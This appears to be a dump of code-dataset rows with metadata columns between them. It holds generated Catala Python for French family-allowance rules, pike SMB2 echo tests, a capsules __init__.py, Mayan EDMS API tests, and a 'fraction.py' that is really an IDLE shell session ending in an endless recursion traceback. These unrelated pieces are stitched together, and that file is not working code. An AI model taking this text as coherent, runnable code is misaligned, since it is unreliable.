law_headings=["Prologue"]))
montant_verse_499 = log_variable_definition(["AllocationsFamiliales",
"montant_versé"], local_var_500)
# Scope assertion (Art. L521-2): the effective caregiver must either be
# a parent or satisfy the Title I conditions; the scope aborts via
# AssertionError otherwise.  Then build the scope's output structure.
try:
local_var_501 = (personne_charge_effective_permanente_est_parent_101 or
(not personne_charge_effective_permanente_est_parent_101 and
personne_charge_effective_permanente_remplit_titre__i_102))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=230, start_column=5,
end_line=234, end_column=6,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]))
assert local_var_501
return AllocationsFamilialesOut(montant_verse_out=montant_verse_499)
def interface_allocations_familiales(interface_allocations_familiales_in_502: InterfaceAllocationsFamilialesIn):
    # Auto-generated code (Catala compiler Python backend) — do not hand-edit
    # logic. This is the user-facing interface scope: it normalizes the raw
    # inputs, feeds them to the AllocationsFamiliales scope, and returns the
    # amount paid. Each nested try/except EmptyError pyramid mirrors Catala's
    # default-value resolution; a NoValueProvided carries the position of the
    # variable in the original .catala_fr source that was left undefined.
    i_date_courante_503 = interface_allocations_familiales_in_502.i_date_courante_in
    i_enfants_504 = interface_allocations_familiales_in_502.i_enfants_in
    i_ressources_menage_505 = interface_allocations_familiales_in_502.i_ressources_menage_in
    i_residence_506 = interface_allocations_familiales_in_502.i_residence_in
    i_personne_charge_effective_permanente_est_parent_507 = interface_allocations_familiales_in_502.i_personne_charge_effective_permanente_est_parent_in
    i_personne_charge_effective_permanente_remplit_titre__i_508 = interface_allocations_familiales_in_502.i_personne_charge_effective_permanente_remplit_titre_I_in
    i_avait_enfant_a_charge_avant_1er_janvier_2012_509 = interface_allocations_familiales_in_502.i_avait_enfant_a_charge_avant_1er_janvier_2012_in
    # enfants_à_charge: map each raw input child record to an Enfant, deriving
    # the schooling-obligation status (before 3 years / until 16 / after) and
    # the age from the birth date and the current date.
    try:
        try:
            try:
                def local_var_512(enfant_513: Any):
                    # Child younger than 3: before compulsory schooling.
                    if ((enfant_513.d_date_de_naissance +
                        duration_of_numbers(3, 0, 0)) >=
                        i_date_courante_503):
                        local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Avant,
                            Unit())
                    else:
                        # Child younger than 16: during compulsory schooling.
                        if ((enfant_513.d_date_de_naissance +
                            duration_of_numbers(16, 0, 0)) >=
                            i_date_courante_503):
                            local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Pendant,
                                Unit())
                        else:
                            local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Apres,
                                Unit())
                    # Age in whole years, computed via date arithmetic from an
                    # epoch of year 0 plus the elapsed duration.
                    return Enfant(identifiant=enfant_513.d_identifiant,
                        obligation_scolaire=local_var_514,
                        remuneration_mensuelle=enfant_513.d_remuneration_mensuelle,
                        date_de_naissance=enfant_513.d_date_de_naissance,
                        age=year_of_date((date_of_numbers(0, 1, 1) +
                            (i_date_courante_503 -
                            enfant_513.d_date_de_naissance))),
                        prise_en_charge=enfant_513.d_prise_en_charge,
                        a_deja_ouvert_droit_aux_allocations_familiales=enfant_513.d_a_deja_ouvert_droit_aux_allocations_familiales)
                local_var_511 = list_map(local_var_512, i_enfants_504)
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./epilogue.catala_fr",
            start_line=74, start_column=11,
            end_line=74, end_column=27,
            law_headings=["Interface du programme",
            "Épilogue", "Décrets divers"]))
    enfants_a_charge_510 = log_variable_definition(["InterfaceAllocationsFamiliales",
        "enfants_à_charge"], local_var_511)
    # allocations_familiales.personne_charge_effective_permanente_est_parent:
    # True when the input flag holds, False otherwise (EmptyError fallback).
    try:
        try:
            try:
                if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
                    start_line=90, start_column=20,
                    end_line=90, end_column=69,
                    law_headings=["Interface du programme", "Épilogue",
                    "Décrets divers"]), i_personne_charge_effective_permanente_est_parent_507):
                    local_var_517 = True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        except EmptyError:
            local_var_517 = False
        local_var_516 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.personne_charge_effective_permanente_est_parent"],
            local_var_517)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=90, start_column=10,
            end_line=90, end_column=57,
            law_headings=["Prologue"]))
    allocations_familiales_dot_personne_charge_effective_permanente_est_parent_515 = local_var_516
    # allocations_familiales.personne_charge_effective_permanente_remplit_titre_I:
    # same True/False-with-fallback pattern as above.
    try:
        try:
            try:
                if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
                    start_line=93, start_column=20,
                    end_line=93, end_column=74,
                    law_headings=["Interface du programme", "Épilogue",
                    "Décrets divers"]), i_personne_charge_effective_permanente_remplit_titre__i_508):
                    local_var_520 = True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        except EmptyError:
            local_var_520 = False
        local_var_519 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.personne_charge_effective_permanente_remplit_titre_I"],
            local_var_520)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=91, start_column=10,
            end_line=91, end_column=62,
            law_headings=["Prologue"]))
    allocations_familiales_dot_personne_charge_effective_permanente_remplit_titre__i_518 = local_var_519
    # allocations_familiales.ressources_ménage: straight pass-through of the
    # household-resources input.
    try:
        try:
            try:
                local_var_523 = i_ressources_menage_505
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_522 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.ressources_ménage"], local_var_523)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=92, start_column=10,
            end_line=92, end_column=27,
            law_headings=["Prologue"]))
    allocations_familiales_dot_ressources_menage_521 = local_var_522
    # allocations_familiales.résidence: pass-through of the residence input.
    try:
        try:
            try:
                local_var_526 = i_residence_506
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_525 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.résidence"], local_var_526)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=93, start_column=10,
            end_line=93, end_column=19,
            law_headings=["Prologue"]))
    allocations_familiales_dot_residence_524 = local_var_525
    # allocations_familiales.date_courante: pass-through of the current date.
    try:
        try:
            try:
                local_var_529 = i_date_courante_503
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_528 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.date_courante"], local_var_529)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=96, start_column=10,
            end_line=96, end_column=23,
            law_headings=["Prologue"]))
    allocations_familiales_dot_date_courante_527 = local_var_528
    # allocations_familiales.enfants_à_charge: pass-through of the converted
    # children list computed above.
    try:
        try:
            try:
                local_var_532 = enfants_a_charge_510
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
        local_var_531 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.enfants_à_charge"], local_var_532)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=99, start_column=10,
            end_line=99, end_column=26,
            law_headings=["Prologue"]))
    allocations_familiales_dot_enfants_a_charge_530 = local_var_531
    # allocations_familiales.avait_enfant_à_charge_avant_1er_janvier_2012:
    # True when the input flag holds, False otherwise (EmptyError fallback).
    try:
        try:
            try:
                if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
                    start_line=96, start_column=20,
                    end_line=96, end_column=66,
                    law_headings=["Interface du programme", "Épilogue",
                    "Décrets divers"]), i_avait_enfant_a_charge_avant_1er_janvier_2012_509):
                    local_var_535 = True
                else:
                    raise EmptyError
            except EmptyError:
                raise EmptyError
        except EmptyError:
            local_var_535 = False
        local_var_534 = log_variable_definition(["InterfaceAllocationsFamiliales",
            "allocations_familiales.avait_enfant_à_charge_avant_1er_janvier_2012"],
            local_var_535)
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
            start_line=120, start_column=10,
            end_line=120, end_column=54,
            law_headings=["Prologue"]))
    allocations_familiales_dot_avait_enfant_a_charge_avant_1er_janvier_2012_533 = local_var_534
    # Invoke the AllocationsFamiliales sub-scope with the assembled inputs,
    # wrapping the call in begin/end log events for the trace.
    result_536 = log_end_call(["InterfaceAllocationsFamiliales",
        "allocations_familiales", "AllocationsFamiliales"],
        log_begin_call(["InterfaceAllocationsFamiliales",
        "allocations_familiales", "AllocationsFamiliales"],
        allocations_familiales,
        AllocationsFamilialesIn(personne_charge_effective_permanente_est_parent_in=allocations_familiales_dot_personne_charge_effective_permanente_est_parent_515,
        personne_charge_effective_permanente_remplit_titre_I_in=allocations_familiales_dot_personne_charge_effective_permanente_remplit_titre__i_518,
        ressources_menage_in=allocations_familiales_dot_ressources_menage_521,
        residence_in=allocations_familiales_dot_residence_524,
        date_courante_in=allocations_familiales_dot_date_courante_527,
        enfants_a_charge_in=allocations_familiales_dot_enfants_a_charge_530,
        avait_enfant_a_charge_avant_1er_janvier_2012_in=allocations_familiales_dot_avait_enfant_a_charge_avant_1er_janvier_2012_533)))
    allocations_familiales_dot_montant_verse_537 = result_536.montant_verse_out
    # i_montant_versé: expose the sub-scope's paid amount as the interface
    # output.
    try:
        try:
            try:
                local_var_539 = allocations_familiales_dot_montant_verse_537
            except EmptyError:
                raise EmptyError
        except EmptyError:
            raise EmptyError
    except EmptyError:
        raise NoValueProvided(SourcePosition(filename="./epilogue.catala_fr",
            start_line=78, start_column=10,
            end_line=78, end_column=25,
            law_headings=["Interface du programme",
            "Épilogue", "Décrets divers"]))
    i_montant_verse_538 = log_variable_definition(["InterfaceAllocationsFamiliales",
        "i_montant_versé"], local_var_539)
    return InterfaceAllocationsFamilialesOut(i_montant_verse_out=i_montant_verse_538)
| 76.137997
| 396
| 0.383342
| 21,132
| 317,800
| 5.359975
| 0.040886
| 0.036374
| 0.045424
| 0.028517
| 0.883488
| 0.832988
| 0.771478
| 0.727714
| 0.701361
| 0.681258
| 0
| 0.061369
| 0.568376
| 317,800
| 4,173
| 397
| 76.156243
| 0.764045
| 0.000205
| 0
| 0.653232
| 1
| 0.003802
| 0.105416
| 0.032008
| 0
| 0
| 0
| 0
| 0.000253
| 1
| 0.057034
| false
| 0.000253
| 0.00076
| 0.016223
| 0.139164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c35e9acc16477719fe87c47513ffae09f91108e5
| 38
|
py
|
Python
|
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | 1
|
2022-02-08T09:33:16.000Z
|
2022-02-08T09:33:16.000Z
|
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | null | null | null |
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | null | null | null |
from . import core
from . import nets
| 12.666667
| 18
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f250ee4f10baf9b2ad19a137501d6e657e670c4
| 5,185
|
py
|
Python
|
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (C) EMC Corporation. All rights reserved.
#
# Module Name:
#
# echo.py
#
# Abstract:
#
# Basic echo send/receive testing
#
# Authors: Lingaraj Gowdar (lingaraj.gowdar@calsoftinc.com)
#
import pike.model
import pike.smb2
import pike.test
import random
import array
import utils
# All tests for the echo request/response
class EchoTest(pike.test.PikeTest):
def test_01_echo_with_valid_struct_size(self):
try:
print "\n--------------------ECHO_TC 01 --------------------"
print "Test case to verify echo request with valid structure size."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj = utils.Convenience()
echo_packet = conv_obj.echo(chan,structure_size=4)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 01 failed.")
print "TC 01 Passed"
def test_02_echo_with_invalid_struct_size(self):
try:
print "\n--------------------ECHO_TC 02 --------------------"
print "Test case to verify echo request with invalid structure size."
expected_status = 'STATUS_INVALID_PARAMETER'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,structure_size=5)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 02 failed.")
print "TC 02 Passed"
def test_03_echo_with_invalid_reserved_value(self):
try:
print "\n--------------------ECHO_TC 03 --------------------"
print "Test case to verify echo request with invalid reserved value."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,reserved=5)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 03 failed.")
print "TC 03 Passed"
def test_04_echo_with_valid_reserved_value(self):
try:
print "\n--------------------ECHO_TC 04 --------------------"
print "Test case to verify echo request with valid reserved value."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,reserved=0)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 04 failed.")
print "TC 04 Passed"
| 42.85124
| 83
| 0.5892
| 566
| 5,185
| 5.243816
| 0.167845
| 0.080863
| 0.059299
| 0.01752
| 0.835243
| 0.819744
| 0.819744
| 0.819744
| 0.778639
| 0.722035
| 0
| 0.011227
| 0.295661
| 5,185
| 120
| 84
| 43.208333
| 0.801479
| 0.04378
| 0
| 0.676768
| 0
| 0
| 0.295789
| 0.02904
| 0
| 0
| 0
| 0
| 0.040404
| 0
| null | null | 0.040404
| 0.060606
| null | null | 0.444444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
6f56526f1aee2b0ff7e88583ddd2d079ced7d222
| 10,122
|
py
|
Python
|
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> ================================ RESTART ================================
>>>
>>> 2**20
1048576
>>> 2**10
1024
>>> ================================ RESTART ================================
>>>
Traceback (most recent call last):
File "C:\Python32\fraction.py", line 1, in <module>
from fraction import *
File "C:\Python32\fraction.py", line 54, in <module>
x = Fraction(1,8)
File "C:\Python32\fraction.py", line 20, in __init__
g = gcd(n,d)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
| 35.515789
| 83
| 0.611836
| 1,816
| 10,122
| 3.40804
| 0.032489
| 0.11068
| 0.287769
| 0.464857
| 0.963968
| 0.963968
| 0.950881
| 0.950881
| 0.950881
| 0.950881
| 0
| 0.057763
| 0.221794
| 10,122
| 284
| 84
| 35.640845
| 0.727942
| 0
| 0
| 0.954225
| 0
| 0
| 0.32283
| 0.320289
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003521
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
48cd5bc976fd05e5cf577c8a294c68880c4745f3
| 12,753
|
py
|
Python
|
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from rest_framework import status
from mayan.apps.rest_api.tests import BaseAPITestCase
from ..permissions import (
permission_group_create, permission_group_delete,
permission_group_edit, permission_group_view,
permission_user_create, permission_user_delete,
permission_user_edit, permission_user_view
)
from .mixins import (
GroupAPITestMixin, GroupTestMixin, UserAPITestMixin, UserTestMixin
)
class GroupAPITestCase(GroupAPITestMixin, GroupTestMixin, BaseAPITestCase):
    """REST API tests for group create/delete/edit under ACL checks."""

    def test_group_create_no_permission(self):
        count_before = Group.objects.count()

        resp = self._request_test_group_create_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        # Group table must be untouched.
        self.assertEqual(Group.objects.count(), count_before)

    def test_group_create_with_permission(self):
        self.grant_permission(permission=permission_group_create)

        count_before = Group.objects.count()

        resp = self._request_test_group_create_api_view()
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)

        # Exactly one new group was created.
        self.assertEqual(Group.objects.count(), count_before + 1)

